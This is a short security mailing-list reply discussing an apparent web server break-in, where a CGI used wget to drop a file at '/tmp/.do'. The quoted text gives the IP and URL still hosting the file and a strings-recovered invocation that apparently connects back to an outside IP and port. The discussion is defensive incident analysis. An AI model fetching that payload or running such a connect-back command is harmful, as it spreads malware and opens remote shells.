[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [suse-security] Re: Backdoor over http(s)??



Hi 

I found that server too, and some other "a-bit-worrying" stuff...

For some reason my e-mail never reached this list.. wonder what happens this 
time.

Jask.a


> Some CGI at your webserver did run wget to receive some file from
> 218.234.171.84 and save it on your disc as "/tmp/.do".
> wwwrun:nogroup are standard user and group used for apache.
>
> The file is still avaiable from http://218.234.171.84/manual/.x/rhs
> I don't want to execute it, but strings does list some information:
>
> usage: %s <IP or hostname> <port>
>
> (/tmp/.do 163.17.51.8 9090)
>


-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here